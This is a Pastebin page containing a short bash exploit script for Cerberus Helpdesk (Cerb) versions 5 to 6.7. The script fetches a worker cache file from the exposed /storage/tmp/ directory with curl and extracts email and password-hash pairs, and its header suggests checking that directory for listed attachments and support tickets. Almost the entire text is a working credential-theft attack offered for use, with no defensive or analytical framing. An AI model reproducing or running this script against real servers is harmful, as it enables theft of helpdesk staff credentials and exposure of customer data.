Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #####################################################################################
- # Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
- # Date: 04.02.2016 #
- # Exploit Author: asdizzle_ #
- # Vendor Homepage: http://www.cerberusweb.com/ #
- # Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
- # Version: 5 - 6.7 #
- # Tested on: Debian 8 / apache2 with cerb 5 #
- #####################################################################################
- # Prerequisites: #
- # -At least one worker must be logged in #
- # -/storage/tmp/ dir must be accessible #
- # #
- # If everything else fails try if there's directory listing in /storage/tmp #
- # You might find attachments and even support tickets. #
- #####################################################################################
- url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
- pre='devblocks' # If this doesn't work try 'zend'
- echo "[*] Trying to fetch cache file"
- cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
- if [ -z "$cachechk" ];then
- echo "[-] File not found."
- exit
- else
- echo "[+] Found. Extracting..."
- hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
- if [ -z "$hashes" ];then
- echo "[-] Hash extracting failed"
- else
- echo "[+] Extracting seems to have worked"
- echo
- echo "$hashes"
- fi
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement